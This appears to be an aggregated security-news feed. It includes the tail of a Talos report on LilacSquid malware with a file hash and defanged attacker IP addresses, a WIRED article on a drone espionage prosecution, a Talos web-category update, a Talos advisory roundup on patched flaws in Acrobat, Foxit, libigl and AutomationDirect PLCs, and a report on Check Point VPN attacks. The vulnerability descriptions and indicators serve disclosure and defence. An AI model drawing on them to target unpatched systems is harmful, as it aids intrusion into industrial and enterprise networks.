Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.  

Additional protection with context to your specific environment and threat data are available from the Firewall Management Center.  

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network. 

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.  

**IOCs**

IOCs for this research can also be found at our GitHub repository here. 

**PurpleInk **

2eb9c6722139e821c2fe8314b356880be70f3d19d8d2ba530adc9f466ffc67d8 

**Network IOCs **

67\[.\]213\[.\]221\[.\]6 

192\[.\]145\[.\]127\[.\]190 

45\[.\]9\[.\]251\[.\]14 

199\[.\]229\[.\]250\[.\]142

LilacSquid: The stealthy trilogy of PurpleInk, InkBox and InkLoader

In seemingly the first case of its kind, the US Justice Department has charged a Chinese national with using a drone to photograph a Virginia shipyard where the US Navy was assembling nuclear submarines.

The United States Department of Justice is quietly prosecuting a novel Espionage Act case involving a drone, a Chinese national, and classified nuclear submarines.

The case is such a rarity that it appears to be the first known prosecution under a World War II–era law that bans photographing vital military installations using aircraft, showing how new technologies are leading to fresh national security and First Amendment issues.

“This is definitely not something that the law has addressed to any significant degree,” Emily Berman, a law professor at the University of Houston who specializes in national security, tells WIRED. “There’s definitely no reported cases.”

On January 5, 2024, Fengyun Shi flew to Virginia while on leave from his graduate studies at the University of Minnesota and rented a Tesla at the airport. His research focused on using AI to detect signs of crop disease in photos. Shi’s subject that week wasn’t plants, however, but allegedly the local shipyards—the only ones manufacturing the latest generation of Navy carrier ships in the country, and nuclear submarines as well.

According to an affidavit filed by FBI special agent Sara Shalowitz in February, a shipyard security officer alerted the Naval Criminal Investigative Service to Shi’s actions. The affidavit alleges that on January 6, Shi was flying a drone in “inclement weather” before it got stuck in a neighbor’s tree. When Shi, who is a Chinese citizen, approached the neighbor for help, he was questioned about his nationality and purpose for being in the area. The unnamed resident took photos of Shi, his license plate, and his ID, and called the police. The affidavit alleges that Shi was “very nervous” when questioned by police and “did not have any real reasons” for flying a drone in bad weather. The police gave Shi the number for the fire department and said he would need to stay on the scene. Instead, he returned the rental car an hour later and left Hampton Roads, Virginia, abandoning the drone.

When the FBI seized the drone and pulled the photos off its memory card, they discovered images that special agent Shalowitz said she recognized as being taken at Newport News Shipyard and BAE Systems, which is a 45-minute drive away. The affidavit states that on the day Shi took the photos, the Newport News Shipyard was “actively manufacturing” aircraft carriers and Virginia class nuclear submarines.

“Naval aircraft carriers have classified and sensitive systems throughout the carriers,” the affidavit states. “The nuclear submarines present on that date also have highly classified and sensitive Navy Nuclear Propulsion Information (‘NNPI’) and those submarines even in the design and construction phase are sensitive and classified.”

The DOJ is charging Shi with six Espionage Act misdemeanors under two statutes: one banning photographing a vital military installation and one banning the use of an aircraft to do so. Each misdemeanor can result in up to a year in prison upon conviction. While he awaits trial, Shi is restricted to living in Virginia under probation. He was forced to surrender his passport. According to court filings, he appears to require a translator.

Shi’s case, filed in federal court in Virginia’s Eastern District, was first spotted by Court Watch in February. Its rarity became apparent in March, after prosecutors filed a motion for a time extension. The judge agreed, writing that it was justified because the case is “so unusual due to the nature of the prosecution and the novel questions of both law and fact.”

Indeed, Shi is being charged “under two statutes which have been rarely prosecuted” to the degree that “the Court has been able to only find one reported case,” the judge wrote. That case, _Genovese v. Town of Southampton,_ centered on just one of the two statutes Shi is being charged under—photographing a military installation, without an aircraft.

The DOJ declined to comment when WIRED posed questions about Shi’s case, including whether the Chinese government is being engaged on the issue.

According to a filing from US prosecutors, both parties wish to end the case in a plea agreement. Shi’s attorney did not respond to multiple requests for comment.

WIRED found multiple social media accounts connected to Shi. He appears to have a small online footprint and few interactions with others online, portraying a life of quiet normalcy. He appears to be a soccer fan who enjoys campus and is a devoted _League of Legends_ player. He even attended the competitive online game’s 2022 World Championship tournament in San Francisco. In fact, according to online records, he often plays _League of Legends_ multiple times a day while awaiting trial in Virginia. His university research is similarly innocuous: He’s developing an app for detecting crop diseases in photos called Gopher Eye, which is being funded by the National Science Foundation, and has applied for a patent. He describes himself as a “startup manager” on LinkedIn.

One of Shi’s colleagues at the University of Minnesota, who spoke to WIRED under the condition of anonymity, says that he was a “typical” kid who was “very passionate” about his research. In the fall of 2023, however, financial and familial strife compounded by mounting pressure from lagging grades led to a break. The colleague said that Shi soon all but disappeared, taking leave from his studies and “basically hiding from all of his normal relationships.” He’s been difficult to contact since then, they say, adding that they did not know that Shi is currently in the US—much less embroiled in a rare national security case.

“From my point of view, he’s had very bad luck,” they say. “I don’t think that he did anything wrong intentionally.”

The question of why the DOJ is prosecuting Shi in the first place looms large over his case. After all, satellites originating in China photograph the US daily, including military sites and aircraft carriers. The degree to which Shi’s nationality played a role in the DOJ’s decision to prosecute the case isn’t clear. The case is proceeding amid rising animosity between China and the US, but Shi isn’t being charged under any laws related to collecting intelligence for a foreign government. He is not being accused of acting as a spy. His only alleged crime is taking photos with a drone.

“The Justice Department has guidelines that say \[nationality\] is not supposed to play a role in a criminal investigation, but there are exceptions to that rule for national security and border-related investigations,” Berman says. “It certainly seems likely that the fact Shi is a Chinese national raises red flags for investigators that wouldn't necessarily go up in the same way if he was an American citizen, rightly or wrongly.”

Cases prosecuted under statutes banning photographing military bases can have implications for First Amendment rights, Berman says. Photographing in a public place is a constitutionally protected activity.

“It would be a good thing to litigate some of these cases and clarify what the rules actually are about what you can and can't do,” she says. “Any time there is uncertainty, that may make people hesitant to do things that they are constitutionally entitled to do.”

The few occasions where statutes banning photographing military installations have come up illustrate this concern. In _Genovese v. Town of Southampton,_ Nancy Genovese sued law enforcement officials who arrested her for photographing an airport—part of which was a military base—while having guns in her car. A jury agreed that law enforcement was maliciously prosecuting Genovese, and she landed a settlement amounting to more than $1 million in 2016. In another incident, in 2014, reporters for The Blade in Ohio filed a federal lawsuit after they were unlawfully detained for taking photos outside a military base. In that case, too, the law favored the plaintiffs, and the reporters were awarded $18,000.

Shi’s case is scheduled to start on June 20.

The Unusual Espionage Act Case Against a Drone Photographer

Generative AI applies to any site “whose primary purpose is to use artificial intelligence models to generate output in the form of text, audio, video or images based on user-supplied prompts.”

Wednesday, May 29, 2024 12:32

Cisco Talos is preparing to release the first in a series of changes to our Web Categorization system, which is designed to simplify the verbiage we use. 

In mid-June, we're adding a new “Generative AI” category that will apply to certain websites. The “Content Category” appears whenever a user searches for a domain on the TalosIntelligence.com Reputation Center.  

Generative AI applies to any site “whose primary purpose is to use artificial intelligence models to generate output in the form of text, audio, video or images based on user-supplied prompts.” This does not include “technologies which tangentially use generative AI as part of their service.” 

We are also renaming “DOT & DOH” to “Encrypted DNS” to better reflect what this category includes.  

Prior to these updates, we recommend revisiting your acceptable use and security policies to see if these changes may affect your current operations. 

As we evolve to better understand data, threats, and user behavior, we will continue to improve our intelligence, providing you the ability to make more informed decisions to keep your network safe without becoming prohibitive to your users. Please stay tuned for additional planned changes to our Content Categories in the coming weeks and months. 

For detailed information on the current Content and Threat Categories, please visit the Intelligence and Threat Categories page. 

The Generative AI category will be available in a future release of Meraki, Secure Access and Umbrella.

New Generative AI category added to Talos reputation services

Acrobat, one of the most popular PDF readers currently available, contains two out-of-bounds read vulnerabilities that could lead to the exposure of sensitive contents of arbitrary memory in the application.

Wednesday, May 29, 2024 12:07

Cisco Talos’ Vulnerability Research team has helped to disclose and patch more than 20 vulnerabilities over the past three weeks, including two in the popular Adobe Acrobat Reader software.

Acrobat, one of the most popular PDF readers currently available, contains two out-of-bounds read vulnerabilities that could lead to the exposure of sensitive contents of arbitrary memory in the application.

There are also eight vulnerabilities in a popular line of PLC CPU modules commonly used in automated environments.

All the vulnerabilities mentioned in this blog post have been patched by their respective vendors, all in adherence to Cisco’s third-party vulnerability disclosure policy.

For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.

**Out-of-bounds read vulnerabilities in Adobe Acrobat**

_Discovered by KPC._

Adobe Acrobat Reader contains two out-of-bounds read vulnerabilities in its Font feature that could lead to the disclosure of sensitive information.

TALOS-2024-1946 (CVE-2024-30311) and TALOS-2024-1952 (CVE-2024-30312) are triggered if the targeted user opens an attacker-created PDF that contains a specially embedded font.

An adversary could exploit these vulnerabilities to read arbitrary memory of the process that runs when Acrobat tries to process the font. It’s possible the adversary could even view sensitive components of arbitrary memory, which they could use in follow-on attacks or the exploitation of other vulnerabilities.

TALOS-2024-1952 is the same exploit as outlined in TALOS-2023-1905, a previously disclosed vulnerability, because Adobe’s initial patch did not properly protect against all possible attack vectors.

**Privilege escalation vulnerability in Foxit PDF Reader**

_Discovered by KPC._

Foxit PDF Reader contains a privilege escalation vulnerability that could allow an adversary to execute commands with SYSTEM-level privileges. Foxit PDF Reader is one of the most popular alternatives to Acrobat Reader available. It also supports the embedding of JavaScript, which is another possible attack vector for adversaries.

TALOS-2024-1989 (CVE-2024-29072) occurs because of improper certification of the updater executable before executing it. A low-privilege user can trigger the update action, which can result in the unexpected elevation of privilege to the SYSTEM level.

**Multiple vulnerabilities in popular image-processing library**

_Discovered by Carl Hurd and Philippe Laulheret._

Talos recently discovered multiple vulnerabilities in libigl, a C++ open-source library used to process geometric shapes and designs. It is commonly used in various industries, from video game development to 3-D printing.

Two out-of-bounds write vulnerabilities, TALOS-2023-1879 (CVE-2023-49600) and TALOS-2024-1930 (CVE-2024-22181), could lead to a heap buffer overflow. An attacker could exploit these vulnerabilities by tricking the targeted user into opening a specially crafted file.

TALOS-2024-1928 (CVE-2024-24584 and CVE-2024-24583) can be exploited in a similar manner, but in this case, leads to an out-of-bounds read.

Two other vulnerabilities, TALOS-2024-1929 (CVE-2024-24684, CVE-2024-24685 and CVE-2024-24686) and TALOS-2023-1784 (CVE-2023-35949, CVE-2023-35952, CVE-2023-35950, CVE-2023-35953, CVE-2023-35951), can cause heap-based buffer overflow issues if the adversary supplies a specially crafted .off file. .OFF files are commonly used to share 2-D and 3-D images.

Lastly, there is another out-of-bounds write vulnerability that is caused by an improper array index validation. TALOS-2024-1926 (CVE-2024-23951, CVE-2024-23950, CVE-2024-23949, CVE-2024-23947 and CVE-2024-23948) can be triggered by a specially crafted .msh file.

**Remote Code Execution vulnerabilities and more in AutomationDirect CPU**

_Discovered by Matt Wiseman._

Several vulnerabilities were identified in the AutomationDirect P3 line of CPU modules. The P3-550E is the most recent CPU module released in the Productivity3000 line of Programmable Automation Controllers from AutomationDirect. The device communicates remotely via ethernet, serial and USB and exposes a variety of control services, including MQTT, Modbus, ENIP and the engineering workstation protocol DirectNET.

Four of the vulnerabilities found in these PLC CPU modules received a CVSS security score of 9.8 out of 10, making them particularly notable.

TALOS-2024-1942 (CVE-2024-21785) is a leftover debug code vulnerability that allow an adversary who can communicate to the device over ModbusRTU to enable the device’s diagnostic interface without any other knowledge of the target device. There is also TALOS-2024-1943 (CVE-2024-23601) which can lead to remote code execution if the attacker sends a specially crafted file to the targeted device and TALOS-2024-1939 (CVE-2024-24963 and CVE-2024-24962) which are stack-based buffer overflows that can also lead to remote code execution if the attacker sends a specially formatted packet to the device.

TALOS-2024-1940 (CVE-2024-22187) and TALOS-2024-1941 (CVE-2024-23315) are both Write-What-Where vulnerabilities that may be triggered if an adversary sends a specially crafted packet to the targeted machine. An adversary who submits a series of properly formatted requests to exploit this vulnerability could modify arbitrary memory regions on the device, potentially resulting in arbitrary remote code execution.

A heap-based buffer vulnerability, TALOS-2024-1936 (CVE-2024-24851), also exists if an adversary sends a specially crafted packet to the targeted device. In this case, the adversary could cause the device to crash due to memory access violations.

Similarly, TALOS-2024-1937 (CVE-2024-24947 and CVE-2024-24946) can also crash the device by exploiting two different functions on the device which are vulnerable to heap-based buffer overflows.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) also released an advisory covering these vulnerabilities, as the P3 line is commonly used in U.S. critical infrastructure and ICS networks. CISA provided users with a list of possible mitigations for these vulnerabilities and other steps administrators can take to protect ICS environments. The agency also stated that organizations in the commercial facilities, critical manufacturing and information technology sectors could be affected.

Out-of-bounds reads in Adobe Acrobat; Foxit PDF Reader contains vulnerability that could lead to SYSTEM-level privileges

By Waqas
Check Point reports hackers are targeting its VPN as the company releases new security measures to prevent unauthorized…
This is a post from HackRead.com Read the original post: Hackers Target Check Point VPNs, Security Fix Released

Check Point reports hackers are targeting its VPN as the company releases new security measures to prevent unauthorized access. Enhance your VPN security with multi-factor authentication and Check Point’s latest solutions.

Over recent months, cybercriminals have increasingly targeted remote-access VPN environments, using them as entry points to infiltrate enterprises. These attackers aim to identify valuable assets and users within organizations, exploiting vulnerabilities to establish persistence on critical enterprise systems.

The Israel-based cybersecurity giant Check Point has observed a troubling trend of compromised VPN solutions across various cybersecurity vendors. Specifically, Check Point’s monitoring has detected unauthorized access attempts targeting its VPNs available for Windows and macOS customers globally

According to the company’s report shared with Hackread.com ahead of publishing on May 27, 2024. By May 24, 2024, a small number of login attempts using outdated VPN local accounts, which relied solely on password-based authentication, were identified.

In response, Check Point assembled specialized teams comprising Incident Response, Research, Technical Services, and Product professionals to investigate these and other potential threats. Through customer notifications and comprehensive analysis, these teams discovered similar unauthorized access attempts within 24 hours among a few potential customers.

It is important to mention that relying on password-only authentication is a significant security risk. Check Point strongly advises against using this method for network infrastructure login. To counteract these unauthorized remote access attempts, Check Point has released a preventative solution.

**Enhancing VPN Security: Recommendations from Check Point**

1.  **Audit Local Accounts**: Review your local accounts to determine their usage and identify any unauthorized access.
2.  **Disable Unused Accounts**: If local accounts are not in use, it is best to disable them to eliminate potential entry points for attackers.
3.  **Implement Multi-Factor Authentication (MFA)**: For local accounts that are necessary and currently rely on password-only authentication, add layer of security, such as certificates, to enhance IT security.
4.  **Deploy Check Point’s Solution**: Check Point customers should deploy the newly released solution on their Security Gateways. This measure will automatically prevent unauthorized access attempts on VPNs using password-only authentication.

****Industry Expert’s Insight****

Venky Raju, Field CTO at ColorTokens, emphasizes the urgency for organizations to transition from legacy VPNs to Zero Trust Network Access (ZTNA) solutions. He notes, _“_This is a stark reminder for organizations to make urgent plans to shift from legacy VPNs to ZTNA solutions._“_

_“_ZTNA solutions have several advantages over VPNs, chief of which is that ZTNA inherently limits what the end user can access using the principles of least privilege. Additionally, ZTNA solutions better integrate with the enterprise’s identity management system, reducing the risk of compromised passwords or misconfiguration,_”_ Raju advises.

1.  NSA, CISA Release Guidelines to Secure VPNs
2.  Hackers dump login data of Fortinet VPN users in plain-text
3.  Ivanti VPN Flaws Exploited to Spread KrustyLoader Malware
4.  Chinese Hackers Stole Ivacy VPN Certificate To Sign Malware
5.  Akira Ransomware Targets Businesses via Exploited CISCO VPNs

Tag

#cisco